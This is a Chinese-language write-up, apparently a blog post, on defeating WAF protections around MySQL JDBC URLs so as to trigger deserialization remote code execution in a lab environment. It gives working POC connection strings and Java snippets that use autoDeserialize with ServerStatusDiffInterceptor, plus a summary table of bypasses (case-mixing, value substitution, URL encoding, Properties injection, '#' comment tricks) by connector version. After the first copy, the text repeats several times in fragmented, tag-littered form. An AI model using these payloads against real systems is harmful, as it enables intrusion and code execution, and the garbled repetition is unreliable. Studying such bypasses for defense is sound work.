征服 JDBC WAF：从防护到绕过的代码解析<\/h1>

环境搭建<\/h2>
测试环境代码：https:\/\/github.com\/Y4Sec-Team\/mysql-jdbc-tricks
环境已加入 Commons Collections (CC) 依赖，用于反序列化漏洞利用。<\/p>

JDBC 无过滤场景<\/h2>

基础环境为简单 JDBC 连接，无任何过滤措施，可直接触发反序列化漏洞。
利用方式<\/strong>：直接发送恶意序列化 payload 即可实现 RCE。<\/p>

大小写绕过<\/h2>
防护机制<\/h3>
WAF 添加基础关键字过滤，但未处理大小写变异。
绕过方法<\/strong>：将关键参数改为大小写混合形式（如 autoDeserialize<\/code> → AutoDESerialize<\/code>）。实战价值<\/strong>：实际开发中可能存在疏忽，此类绕过仍具可行性。<\/p>
关键字替换绕过<\/h2> 防护机制<\/h3> WAF 过滤了 true<\/code> 值，但未覆盖其他布尔表示形式（如 1<\/code>、yes<\/code>）。绕过方法<\/strong>：<\/p> 将 autoDeserialize=true<\/code> 替换为 autoDeserialize=yes<\/code> 或 autoDeserialize=1<\/code>。 POC<\/strong>：<\/li> <\/ul> jdbc:mysql:<\/span>\/\/target:3306\/test?autoDeserialize=yes&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor <\/span><\/span><\/span><\/code><\/pre>成功触发计算器弹出。<\/p> URL 编码绕过<\/h2> 防护机制<\/h3> WAF 进一步过滤 yes<\/code>、true<\/code> 等值，需深入代码层分析。<\/p> 调试分析<\/h3> 入口点<\/strong>：DriverManager.getConnection()<\/code> 启动数据库连接。<\/li> 参数解析<\/strong>：在 ConnectionString.parseUrl()<\/code> 中解析 URL 参数。<\/li> 关键流程<\/strong>：按 &<\/code>、=<\/code>、?<\/code> 分割参数。<\/li> 对每个 key=value<\/code> 进行 URL 解码（URLDecoder.decode()<\/code>）。结论<\/strong>：可通过 URL 编码绕过关键字检测。<\/li> <\/ul> <\/li> <\/ol> POC<\/h3> 将参数值编码后传递：<\/p> jdbc:mysql:<\/span>\/\/target:3306\/test?autoDeserialize=%79%65%73&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor <\/span><\/span><\/span><\/code><\/pre>（注：%79%65%73<\/code> 为 yes<\/code> 的 URL 编码）成功触发计算器。<\/p> 更换参数传入位置<\/h2> 防护机制<\/h3> WAF 仅检测 URL 路径中的参数，未覆盖连接属性（Properties）。绕过方法<\/strong>：通过 Properties<\/code> 对象传递恶意参数：<\/p> Properties props =<\/span> new<\/span> Properties();<\/span> <\/span><\/span>props.<\/span>setProperty<\/span>(<\/span>"autoDeserialize"<\/span>,<\/span> "true"<\/span>);<\/span> <\/span><\/span>props.<\/span>setProperty<\/span>(<\/span>"queryInterceptors"<\/span>,<\/span> "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor"<\/span>);<\/span> <\/span><\/span>DriverManager.<\/span>getConnection<\/span>(<\/span>"jdbc:mysql:\/\/target:3306\/test"<\/span>,<\/span> props);<\/span> <\/span><\/span><\/code><\/pre>此方式完全绕过 URL 参数检测。<\/p> 利用 URL 注释符突破单参数限制<\/h2> 防护机制<\/h3> WAF 限制额外参数传入，并对参数字符串进行检测。<\/p> 绕过方法 1：控制其他参数<\/h3> 在 user<\/code> 或 password<\/code> 参数中注入恶意值：<\/p> jdbc:mysql:<\/span>\/\/target:3306\/test?user=root&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor <\/span><\/span><\/span><\/code><\/pre>（注：需确保 user<\/code> 或 password<\/code> 位置可控制）<\/p> 绕过方法 2：MySQL 8.x 链替换<\/h3> MySQL 8.x 无法使用 detectCustomCollations<\/code> 链，需替换为 ServerStatusDiffInterceptor<\/code> 链。测试代码<\/strong>：<\/p> String url =<\/span> "jdbc:mysql:\/\/target:3306\/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor"<\/span>;<\/span> <\/span><\/span>Connection conn =<\/span> DriverManager.<\/span>getConnection<\/span>(<\/span>url,<\/span> "root"<\/span>,<\/span> "password"<\/span>);<\/span> <\/span><\/span><\/code><\/pre>成功触发计算器。<\/p> 调试分析（MySQL 8.x）<\/h3> 参数解析<\/strong>：在 ConnectionString.getProperties()<\/code> 中调用 parseQuerySection()<\/code>。<\/li> 解码处理<\/strong>：processKeyValuePattern()<\/code> 对 key 和 value 均进行 URL 解码。结论<\/strong>：MySQL 8.x 仍可通过编码绕过。<\/li> <\/ol> URL 注释符注释绕过<\/h2> 防护机制<\/h3> WAF 强制追加 autoDeserialize=false<\/code>，阻断利用。<\/p> 绕过方法<\/h3> 使用 URL 注释符 #<\/code> 注释后续参数：<\/p> jdbc:mysql:<\/span>\/\/target:3306\/test?autoDeserialize=true#&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor <\/span><\/span><\/span><\/code><\/pre>（注：#<\/code> 后的内容会被视为片段标识符，不被服务器处理）<\/p> ?<\/code> 与 #<\/code> 组合拳绕过<\/h2> 防护机制<\/h3> WAF 检测 user<\/code> 和 password<\/code> 中的恶意代码。<\/p> 绕过方法<\/h3> 通过 ?<\/code> 和 #<\/code> 构造参数分离：<\/p> jdbc:mysql:<\/span>\/\/target:3306\/test?user=root&password=root#&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor <\/span><\/span><\/span><\/code><\/pre>解析结果<\/strong>：<\/p> 实际传递参数：user=root<\/code>、password=root<\/code>（避开检测）。<\/li> #<\/code> 后的参数被注释，但客户端解析时仍生效。<\/li> <\/ul> Pass10：终极防护与绕过<\/h2> 防护机制<\/h3> WAF 直接检测最终 URL 字符串，无解码或注释处理。结论<\/strong>：<\/p> MySQL Connector 6.x：无绕过方法。<\/li> MySQL Connector 8.x：仍可通过 URL 编码绕过（因解码在 WAF 之后）。<\/li> <\/ul> 总结<\/h2> 防护方式<\/th> 绕过方法<\/th> 适用版本<\/th> <\/tr> <\/thead> 大小写检测<\/td> 大小写混合<\/td> 所有<\/td> <\/tr> 关键字值过滤<\/td> 替换为 yes<\/code>\/1<\/code><\/td> 所有<\/td> <\/tr> 关键字值加强过滤<\/td> URL 编码<\/td> 所有<\/td> <\/tr> 参数位置检测<\/td> 通过 Properties 传递<\/td> 所有<\/td> <\/tr> 单参数限制<\/td> 注入到 user\/password<\/td> 所有<\/td> <\/tr> 强制追加参数<\/td> 用 #<\/code> 注释<\/td> 所有<\/td> <\/tr> 全字符串检测<\/td> URL 编码（仅 8.x）<\/td> MySQL 8.x<\/td> <\/tr> <\/tbody> <\/table> 参考资源<\/strong>：<\/p> https:\/\/github.com\/Y4Sec-Team\/mysql-jdbc-tricks<\/li> MySQL Connector 源码调试（关键类：ConnectionString<\/code>、parseUrl<\/code>）<\/li> <\/ul> 注意<\/strong>：实际利用需结合目标环境版本及 WAF 具体实现调整。<\/p>

征服 JDBC WAF：从防护到绕过的代码解析<\/h1>

环境搭建<\/h2>
测试环境代码：https:\/\/github.com\/Y4Sec-Team\/mysql-jdbc-tricks
环境已加入 Commons Collections (CC) 依赖，用于反序列化漏洞利用。<\/p>

大小写绕过<\/h2>

关键字替换绕过<\/h2>

URL 编码绕过<\/h2>

防护机制<\/h3>
WAF 进一步过滤 `yes<\/code>、true<\/code> 等值，需深入代码层分析。<\/p>`

更换参数传入位置<\/h2>

利用 URL 注释符突破单参数限制<\/h2>

防护机制<\/h3>
WAF 限制额外参数传入，并对参数字符串进行检测。<\/p>

URL 注释符注释绕过<\/h2>

防护机制<\/h3>
WAF 强制追加 `autoDeserialize=false<\/code>，阻断利用。<\/p>`

防护机制<\/h3>
WAF 检测 `user<\/code> 和 password<\/code> 中的恶意代码。<\/p>`

Pass10：终极防护与绕过<\/h2>

防护方式<\/th>	绕过方法<\/th>	适用版本<\/th> <\/tr> <\/thead>
大小写检测<\/td>	大小写混合<\/td>	所有<\/td> <\/tr>
关键字值过滤<\/td>	替换为 `yes<\/code>\/1<\/code><\/td>`	所有<\/td> <\/tr>
关键字值加强过滤<\/td>	URL 编码<\/td>	所有<\/td> <\/tr>
参数位置检测<\/td>	通过 Properties 传递<\/td>	所有<\/td> <\/tr>
单参数限制<\/td>	注入到 user\/password<\/td>	所有<\/td> <\/tr>
强制追加参数<\/td>	用 `#<\/code> 注释<\/td>`	所有<\/td> <\/tr>
全字符串检测<\/td>	URL 编码（仅 8.x）<\/td>	MySQL 8.x<\/td> <\/tr> <\/tbody> <\/table> 参考资源<\/strong>：<\/p> https:\/\/github.com\/Y4Sec-Team\/mysql-jdbc-tricks<\/li> MySQL Connector 源码调试（关键类：`ConnectionString<\/code>、parseUrl<\/code>）<\/li> <\/ul> 注意<\/strong>：实际利用需结合目标环境版本及 WAF 具体实现调整。<\/p>`

征服 JDBC WAF：从防护到绕过的代码解析<\/h1>

环境搭建<\/h2> 测试环境代码：https:\/\/github.com\/Y4Sec-Team\/mysql-jdbc-tricks 环境已加入 Commons Collections (CC) 依赖，用于反序列化漏洞利用。<\/p>

大小写绕过<\/h2>

关键字替换绕过<\/h2>

URL 编码绕过<\/h2>

防护机制<\/h3> WAF 进一步过滤 yes<\/code>、true<\/code> 等值，需深入代码层分析。<\/p>

更换参数传入位置<\/h2>

利用 URL 注释符突破单参数限制<\/h2>

防护机制<\/h3> WAF 限制额外参数传入，并对参数字符串进行检测。<\/p>

URL 注释符注释绕过<\/h2>

防护机制<\/h3> WAF 强制追加 autoDeserialize=false<\/code>，阻断利用。<\/p>

防护机制<\/h3> WAF 检测 user<\/code> 和 password<\/code> 中的恶意代码。<\/p>

Pass10：终极防护与绕过<\/h2>

环境搭建<\/h2>
测试环境代码：https:\/\/github.com\/Y4Sec-Team\/mysql-jdbc-tricks
环境已加入 Commons Collections (CC) 依赖，用于反序列化漏洞利用。<\/p>

防护机制<\/h3>
WAF 进一步过滤 `yes<\/code>、true<\/code> 等值，需深入代码层分析。<\/p>`

防护机制<\/h3>
WAF 限制额外参数传入，并对参数字符串进行检测。<\/p>

防护机制<\/h3>
WAF 强制追加 `autoDeserialize=false<\/code>，阻断利用。<\/p>`

防护机制<\/h3>
WAF 检测 `user<\/code> 和 password<\/code> 中的恶意代码。<\/p>`